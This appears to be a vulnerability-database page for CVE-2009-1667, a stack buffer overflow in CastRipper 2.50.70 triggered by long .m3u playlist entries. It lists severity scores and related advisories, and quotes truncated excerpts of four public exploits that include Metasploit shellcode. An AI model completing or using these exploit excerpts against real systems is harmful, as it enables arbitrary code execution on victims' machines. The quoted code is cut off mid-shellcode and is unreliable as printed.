CVE-2009-1667
published 2009-05-18CVE-2009-1667: Stack-based buffer overflow in Mini-stream CastRipper 2.50.70 allows remote attackers to execute arbitrary code via a long entry in a .m3u file, a different…
PriorityP352critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
21.40%
97.3th percentile
Stack-based buffer overflow in Mini-stream CastRipper 2.50.70 allows remote attackers to execute arbitrary code via a long entry in a .m3u file, a different vector than CVE-2009-5137.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | castripper | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q3q4-v3q2-g64r: Stack-based buffer overflow in Mini-stream CastRipper 2
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-1667 [HIGH] CWE-119 GHSA-q3q4-v3q2-g64r: Stack-based buffer overflow in Mini-stream CastRipper 2
Stack-based buffer overflow in Mini-stream CastRipper 2.50.70 allows remote attackers to execute arbitrary code via a long entry in a .m3u file, a different vector than CVE-2009-5137.
GHSA
GHSA-6fmc-jx85-mmx4: Stack-based buffer overflow in Mini-stream CastRipper 2
ghsa_unreviewed·2022-05-02·CVSS 9.3
CVE-2009-5137 [CRITICAL] CWE-119 GHSA-6fmc-jx85-mmx4: Stack-based buffer overflow in Mini-stream CastRipper 2
Stack-based buffer overflow in Mini-stream CastRipper 2.50.70 allows remote attackers to execute arbitrary code via a long URL in the [playlist] section in a .pls file, a different vector than CVE-2009-1667.
No detection rules found.
Exploit-DB
CastRipper (Windows XP SP2) - '.m3u' Local Stack Buffer Overflow
exploitdb·2009-12-24
CVE-2009-1667 CastRipper (Windows XP SP2) - '.m3u' Local Stack Buffer Overflow
CastRipper (Windows XP SP2) - '.m3u' Local Stack Buffer Overflow
---
//Exploit Title: CastRipper (.M3U) Stack BOF WinXP SP2 - C
// Date: 25/12/2009
// Author: bibi-info
// Version: 2.50.70
// Tested on: Windows Xp sp2
// greetz : His0k4 & All friends & muslims HaCkers(dz)
#include
#include
#include
/* win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com */
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x
Exploit-DB
CastRipper 2.50.70 - '.m3u' Universal Stack Overflow
exploitdb·2009-05-12
CVE-2009-1667 CastRipper 2.50.70 - '.m3u' Universal Stack Overflow
CastRipper 2.50.70 - '.m3u' Universal Stack Overflow
---
#!/usr/bin/python
print "**************************************************************************"
print " CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8660\n"
print " Exploit code: super-cristal\n"
print " Tested on: Windows XP Pro SP3\n"
print " Greetings to:"
print " His0k4, all friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x
Exploit-DB
CastRipper 2.50.70 - '.m3u' Local Buffer Overflow
exploitdb·2009-05-12
CVE-2009-1667 CastRipper 2.50.70 - '.m3u' Local Buffer Overflow
CastRipper 2.50.70 - '.m3u' Local Buffer Overflow
---
#!/usr/bin/perl
#[+]--------------------------------------------------------------------------------------[+]#
# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
# By [0]x80->[H]4x²0r
# hashteck[at]Gmail[dot]com
# From Morocco
#[+]--------------------------------------------------------------------------------------[+]#
# program : CastRipper
# version : 2.50.70
# download : http://www.mini-stream.net/castripper/
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit Vista Pro
# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)#
# NOTE : if you want to use it under an other version of Win32 use jmpfind.exe
#( avalaible on the net) to
Exploit-DB
CastRipper 2.50.70 - '.m3u' Universal Stack Overflow
exploitdb·2009-05-12
CVE-2009-1667 CastRipper 2.50.70 - '.m3u' Universal Stack Overflow
CastRipper 2.50.70 - '.m3u' Universal Stack Overflow
---
#!/usr/bin/perl
# CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit
# Exploited By Stack
# first exploiter :d http://www.milw0rm.com/exploits/8660 bien jouer :d frero
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41
No writeups or analysis indexed.
2009-05-18
Published